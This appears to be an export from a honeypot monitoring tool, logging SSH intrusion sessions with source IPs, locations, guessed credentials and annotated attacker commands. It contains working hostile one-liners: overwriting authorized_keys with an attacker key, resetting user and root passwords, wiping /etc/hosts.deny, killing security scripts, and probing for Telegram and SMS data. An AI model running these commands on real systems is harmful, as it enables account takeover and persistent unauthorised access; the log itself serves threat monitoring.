$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 lantern_root_17 (103.39.225.73) β€” Guangzhou, China Β· 1 session Β· 20 cmds
2026-05-31 01:39 EDT Β· as transfer/transfer
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "transfer\noJLHDfWfVVdz\noJLHDfWfVVdz"|passwd|bash
$ Enter new UNIX password:
$ echo "transfer\noJLHDfWfVVdz\noJLHDfWfVVdz\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_55 (159.65.2.17) β€” Singapore, Singapore Β· 1 session Β· 20 cmds
2026-05-31 00:55 EDT Β· as django/django123!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "django123!\nSkLknn8CVQ5P\nSkLknn8CVQ5P"|passwd|bash
$ Enter new UNIX password:
$ echo "django123!\nSkLknn8CVQ5P\nSkLknn8CVQ5P\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 lantern_root_18 (14.103.107.209) β€” Beijing, China Β· 1 session Β· 20 cmds
2026-05-31 00:51 EDT Β· as foundry/123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123\nhVz0pYSgHmlY\nhVz0pYSgHmlY"|passwd|bash
$ Enter new UNIX password:
$ echo "123\nhVz0pYSgHmlY\nhVz0pYSgHmlY\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 lotus_root_9 (103.88.76.27) β€” TirupporΕ«r, India Β· 2 sessions Β· 40 cmds
2026-05-25 12:18 EDT Β· as mega/mega, openkm/openkm
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "openkm\nqw1LzcjRuMFh\nqw1LzcjRuMFh"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "openkm\nqw1LzcjRuMFh\nqw1LzcjRuMFh\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "mega\nVVYGmppIj4j7\nVVYGmppIj4j7"|passwd|bash
$ echo "mega\nVVYGmppIj4j7\nVVYGmppIj4j7\n"|passwd
🎭 specter_root_48 (103.85.66.217) β€” Depok, Indonesia Β· 4 sessions Β· 36 cmds
2026-05-27 11:28 EDT Β· as root/root
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ /ip cloud print Γ—4
$ ifconfig Γ—4 // network mapping
$ uname -a Γ—4 // OS/kernel identification
$ cat /proc/cpuinfo Γ—4 // CPU profiling
$ ps | grep '[Mm]iner' Γ—4
$ ps -ef | grep '[Mm]iner' Γ—4
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/* Γ—4
$ locate D877F783D5D3EF8Cs Γ—4
$ echo Hi | cat -n Γ—4
🎭 frost_root_6 (178.185.136.57) β€” St Petersburg, Russia Β· 1 session Β· 20 cmds
2026-05-30 23:45 EDT Β· as openkm/openkm
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "openkm\nRVOlk4E4fzLu\nRVOlk4E4fzLu"|passwd|bash
$ Enter new UNIX password:
$ echo "openkm\nRVOlk4E4fzLu\nRVOlk4E4fzLu\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 yankee_root_20 (108.179.225.94) β€” Houston, United States Β· 1 session Β· 20 cmds
2026-05-30 23:43 EDT Β· as openkm/openkm
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "openkm\nm2RYD9UJdMNS\nm2RYD9UJdMNS"|passwd|bash
$ Enter new UNIX password:
$ echo "openkm\nm2RYD9UJdMNS\nm2RYD9UJdMNS\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom_root_41 (41.216.177.55) β€” Jakarta, Indonesia Β· 1 session Β· 20 cmds
2026-05-30 23:36 EDT Β· as backupuser/backupuser
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "backupuser\nMQbCom6ouJLF\nMQbCom6ouJLF"|passwd|bash
$ Enter new UNIX password:
$ echo "backupuser\nMQbCom6ouJLF\nMQbCom6ouJLF\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_56 (175.182.40.134) β€” Taichung, Taiwan Β· 1 session Β· 20 cmds
2026-05-30 22:49 EDT Β· as arthur/arthur
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "arthur\nANEmVbB2BW1V\nANEmVbB2BW1V"|passwd|bash
$ Enter new UNIX password:
$ echo "arthur\nANEmVbB2BW1V\nANEmVbB2BW1V\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wraith_root_44 (210.79.142.221) β€” Pulerejo, Indonesia Β· 5 sessions Β· 98 cmds
2026-05-23 14:47 EDT Β· as alex/123qweasd, root/Asdf1234, root/passW0rd
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—5 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—5 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—5 // CPU profiling
$ echo "root:NnNPS7k03SX5"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—5 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—5
$ ls -lh $(which ls) Γ—5
$ which ls Γ—5
$ crontab -l Γ—5 // persistence setup
$ w Γ—5 // logged-in users check
$ uname -m Γ—5
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—5 // CPU profiling
$ top Γ—5 // process monitoring
$ uname Γ—5 // OS identification
$ uname -a Γ—5 // OS/kernel identification
$ whoami Γ—5 // privilege check
$ lscpu | grep Model Γ—5
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—5
$ echo -e "123qweasd\nxiE8tAZYXap8\nxiE8tAZYXap8"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "123qweasd\nxiE8tAZYXap8\nxiE8tAZYXap8\n"|passwd
$ echo -e "123qweasd\nKjVTlqBHkdyY\nKjVTlqBHkdyY"|passwd|bash
$ echo "123qweasd\nKjVTlqBHkdyY\nKjVTlqBHkdyY\n"|passwd
$ echo "root:ah4FnvfyyBM5"|chpasswd|bash
$ echo -e "123qweasd\nPWCSRYS8kmJa\nPWCSRYS8kmJa"|passwd|bash
$ echo "123qweasd\nPWCSRYS8kmJa\nPWCSRYS8kmJa\n"|passwd
🎭 k-pop_root_9 (115.178.75.242) β€” Gangseo-gu, South Korea Β· 1 session Β· 19 cmds
2026-05-30 22:35 EDT Β· as root/1234qwer.
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:EFUJCIvKtBzK"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 moose_root_3 (70.81.127.119) β€” Sherbrooke, Canada Β· 2 sessions Β· 40 cmds
2026-05-24 11:05 EDT Β· as jack/123, user/user.
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "user.\nSxe2tnmQgS5o\nSxe2tnmQgS5o"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "user.\nSxe2tnmQgS5o\nSxe2tnmQgS5o\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "123\nfsMm3iKNSqC3\nfsMm3iKNSqC3"|passwd|bash
$ echo "123\nfsMm3iKNSqC3\nfsMm3iKNSqC3\n"|passwd
🎭 ghost_root_57 (103.138.113.149) β€” Qui Nhon, Vietnam Β· 2 sessions Β· 39 cmds
2026-05-30 22:11 EDT Β· as alex/123qweasd, root/passW0rd
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "123qweasd\nDTks524ycRmT\nDTks524ycRmT"|passwd|bash
$ Enter new UNIX password:
$ echo "123qweasd\nDTks524ycRmT\nDTks524ycRmT\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:LcXtleQ5KrWK"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 wok_root_10 (60.178.29.66) β€” Ningbo, China Β· 1 session Β· 2 cmds
2026-05-30 22:25 EDT Β· as alex/alex2024
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 yankee_root_21 (165.22.34.238) β€” Clifton, United States Β· 2 sessions Β· 39 cmds
2026-05-30 22:07 EDT Β· as alex/123qweasd, root/passW0rd
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:J3SUXzYDe1pF"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
